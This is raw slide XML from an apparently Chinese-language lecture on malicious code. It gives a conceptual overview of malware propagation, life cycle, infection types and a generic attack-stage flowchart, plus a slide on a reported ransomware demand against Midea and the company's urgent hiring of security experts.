              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：一些视频和音频播放器支持显示网页或用弹出窗口显示它们，然而播放器缺乏浏览器那样的安全检查，因此更容易 受通过网页的恶意代码攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e)网络攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：在信息系统存在安全漏洞时，网络攻击可能使攻击者截获系统的控制权，实施非授权的操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f)自我传播</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>g)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>扫二维码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C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2385695" y="739458"/>
            <a:ext cx="7867650" cy="5461318"/>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346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恶意代码生成和传播</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1679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恶意代码生命周期</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1779270" y="915035"/>
            <a:ext cx="10264775" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>恶意代码的生命周期：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编制代码、传播、感染、触发、运行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>感染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>机制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a)感染引导系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b)感染执行文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>外壳型恶意代码：并不改变被攻击宿主文件的主体，而是将病毒依附于宿主的头部或尾部，这类似于给程序加壳，恶意代码将程序开始或结束时截获系统控制权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>嵌入型恶意代码：寄生在文件的中间，隐蔽性很强</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>源代码型恶意代码：专门攻击计算机开发语言，并能和后者一道编译</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>覆盖型恶意代码：替换全部或者部分宿主，从而对宿主直接造成破坏</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>填充型恶意代码：仅仅填充宿主的空闲区域，它不直接破坏宿主，也不改变宿主文件的长度，因此隐蔽性更强</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c)感染结构化文档</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d)感染网络服务或客户端</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e)假冒文件</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p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600075" y="307975"/>
            <a:ext cx="10920412" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>美的遭病毒勒索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1000万美金</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779780" y="1349375"/>
            <a:ext cx="7672705" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>8月11日下午，有网络传言称，“美的集团在休集体年假期间遭遇加密勒索，工厂</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>多处电脑中病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，导致无法打开文件或进入不了系统。该病毒为勒索病毒，需要7天内汇</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1000万美金</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>到指定账户。”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1395095" y="2912745"/>
            <a:ext cx="3081020" cy="2980055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4803775" y="2778760"/>
            <a:ext cx="2560320" cy="2971165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="等腰三角形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8820150" y="3799840"/>
            <a:ext cx="320675" cy="267970"/>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137775" y="1169035"/>
            <a:ext cx="1759585" cy="9163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sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>刺激网安</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>人才需求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="直接连接符 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9533924" y="1556884"/>
            <a:ext cx="0" cy="4193179"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9817735" y="2548255"/>
            <a:ext cx="2155190" cy="2999740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>事发当晚，在招聘软件上却发现了美的的相关招聘信息，美的连夜以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10 万~18万天价月薪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>紧急招聘信息安全技术专家。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779780" y="1344295"/>
            <a:ext cx="7672705" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>8月11日下午，有网络传言称，“美的集团在休集体年假期间遭遇加密勒索，工厂</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>多处电脑中病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，导致无法打开文件或进入不了系统。该病毒为勒索病毒，需要7天内汇</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1000万美金</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>到指定账户。”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1395095" y="2907665"/>
            <a:ext cx="3081020" cy="29800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bldLvl="0" animBg="1"/>
      <p:bldP spid="11" grpId="1" animBg="1"/>
      <p:bldP spid="2" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2" grpId="1" animBg="1"/>
      <p:bldP spid="6" grpId="0"/>
      <p:bldP spid="6" grpId="1"/>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恶意代码攻击模型</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2177415" y="1124585"/>
            <a:ext cx="2576195" cy="93218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确定攻击目标</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>搜集目标信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5215255" y="1299845"/>
            <a:ext cx="1442085" cy="581660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>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b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="流程图: 决策 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2045970" y="2380615"/>
            <a:ext cx="2884170" cy="1213485"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDecision">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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>侵入系统成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings 2" panose="05020102010507070707" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="流程图: 决策 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2045970" y="4016375"/>
            <a:ext cx="2884170" cy="1213485"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDecision">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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获得一般用户权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings 2" panose="05020102010507070707" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5215255" y="4157345"/>
            <a:ext cx="2197100" cy="93218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实施隐蔽策略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings 2" panose="05020102010507070707" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5215255" y="5584190"/>
            <a:ext cx="2197100" cy="93218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获得超级用户权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings 2" panose="05020102010507070707" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="流程图: 决策 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8248015" y="4017010"/>
            <a:ext cx="2550160" cy="1213485"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDecision">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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获得一般用户权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings 2" panose="05020102010507070707" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436610" y="5584190"/>
            <a:ext cx="2197100" cy="93218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实施破坏行为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Wingdings 2" panose="05020102010507070707" charset="0"/>
              </a:rPr>
              <a:t>⑤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接箭头连接符 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3483610" y="2056765"/>
            <a:ext cx="22225" cy="3238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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505835" y="3594100"/>
            <a:ext cx="0" cy="422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0" idx="3"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930140" y="4623435"/>
            <a:ext cx="28511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2"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="3941445" y="4776470"/>
            <a:ext cx="820420" cy="1727200"/>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0"/>
            <a:endCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6313805" y="5107305"/>
            <a:ext cx="0" cy="49466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412355" y="4624070"/>
            <a:ext cx="96266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4" idx="2"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9523095" y="5248275"/>
            <a:ext cx="12065" cy="35369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14" idx="3"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9523095" y="4034790"/>
            <a:ext cx="1275080" cy="607060"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -18675"/>
              <a:gd name="adj2" fmla="val 13922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9" idx="1"/>
            <a:endCxn id="2" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2063750" y="1590675"/>
            <a:ext cx="131445" cy="1397000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -181159"/>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633710" y="1124585"/>
            <a:ext cx="640080" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>重复</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3706495" y="5321300"/>
            <a:ext cx="411480" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9622790" y="5197475"/>
            <a:ext cx="411480" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
